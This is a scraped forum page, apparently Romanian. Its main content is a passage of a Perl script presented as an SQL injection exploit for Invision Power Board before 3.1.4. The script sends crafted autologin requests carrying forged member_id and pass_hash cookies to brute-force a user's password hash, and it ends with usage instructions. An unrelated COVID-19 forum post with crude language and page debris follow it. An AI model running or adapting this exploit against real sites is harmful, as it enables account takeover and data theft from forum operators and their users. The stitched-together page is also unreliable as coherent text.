%sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n" , $path , $server , $cmember_id , $pass_hash1 , $cmember_id , $pass_hash2 , $pass_hash3 , $nmalykh ); while(< $socket >) { if (/ Set - Cookie : session_id = 0 ;/) { return 1 ; } } return 0 ; } sub status () { $status = $n % 5 ; if( $status == 0 ){ print "\b\b/]" ; } if( $status == 1 ){ print "\b\b-]" ; } if( $status == 2 ){ print "\b\b\\]" ; } if( $status == 3 ){ print "\b\b|]" ; } } sub usage () { print q ( Invision Power Board v < 3.1.4 SQL injection exploit ---------------------------------------------------- USAGE : ~~~~~~ r57ipb3 . pl [ server ] [/ folder /] [ member_id ] [ target ] [ server ] - host where IPB installed [/ folder /] - folder where IPB installed [ member_id ] - user id for brute targets : 0 - IPB 1. * 1 - IPB 2. * 2 - IPB 3. * ( Prior To 3.1.4 ) e . g . r57ipb3 . pl 127.0.0.1 / IPB / 1 1 ---------------------------------------------------- ( c ) oded by 1dt . w0lf RST / GHC , http : //rst.void.ru , http://ghc.ru ); exit(); For convenience, change 72 line to print $target ( ' - IPB 3.*' ); Source
  25. Kev

    COVID-19

    Sunt indiferent, mi se rupe, locuiesc la țară, lapte bio, cartofi bio, roșii bio, țuică fiartă Fut in gripa lor
×
×
  • Create New...